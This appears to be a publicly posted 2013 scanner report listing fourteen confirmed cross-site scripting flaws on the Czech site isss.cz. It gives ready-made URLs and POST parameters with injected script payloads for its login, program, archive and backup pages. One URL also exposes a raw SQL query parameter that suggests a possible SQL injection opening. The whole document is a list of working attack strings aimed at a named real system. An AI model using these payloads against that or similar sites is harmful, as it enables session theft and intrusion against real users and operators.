sroub3k

isss.cz

Apr 26th, 2013
XSS (Cross-site Scripting)

Severity: Important
Confirmation: Confirmed
URL: https://www.isss.cz/portal/login.asp?'"--></style></script><script>alert(0x00009C)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: Query Based
Parameter Type: FullQueryString
Attack Pattern: '"--></style></script><script>alert(0x00009C)</script>

Severity: Important
Confirmation: Confirmed
URL: https://www.isss.cz/portal/login.asp?req='"--></style></script><script>alert(0x000244)</script>&empty=1
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: req
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000244)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.isss.cz/program.asp?subjekt='"--></style></script><script>alert(0x00023F)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: subjekt
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x00023F)</script>

Severity: Important
Confirmation: Confirmed
URL: https://www.isss.cz/portal/login.asp
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: req
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x000490)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.isss.cz/archiv/2012/program.asp?subjekt='"--></style></script><script>alert(0x000A53)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: subjekt
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x000A53)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.isss.cz/archiv/2006/program.asp?subjekt='"--></style></script><script>alert(0x001345)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: subjekt
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x001345)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.isss.cz/archiv/2003/program.asp?subjekt='"--></style></script><script>alert(0x001560)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: subjekt
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x001560)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.isss.cz/archiv/2005/program.asp?subjekt='"--></style></script><script>alert(0x00170A)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: subjekt
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x00170A)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.isss.cz/archiv/2004/program.asp?subjekt='"--></style></script><script>alert(0x00190E)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: subjekt
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x00190E)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.isss.cz/archiv/2010/program.asp?subjekt='"--></style></script><script>alert(0x001FCF)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: subjekt
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x001FCF)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.isss.cz/archiv/2008/program.asp?subjekt='"--></style></script><script>alert(0x00204F)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: subjekt
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x00204F)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.isss.cz/backup.asp?from='"--></style></script><script>alert(0x002149)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: from
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x002149)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.isss.cz/archiv/2007/program.asp?subjekt='"--></style></script><script>alert(0x002170)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: subjekt
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x002170)</script>

Severity: Important
Confirmation: Confirmed
URL: http://www.isss.cz/archiv/2003/program.asp?nazev='"--></style></script><script>alert(0x00234F)</script>&sql=den=#03/24/2003# AND lokalita=18 AND cas>=#09:00:00# AND cas+delka<=#10:35:00#
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: nazev
Parameter Type: Querystring
Attack Pattern: '"--></style></script><script>alert(0x00234F)</script>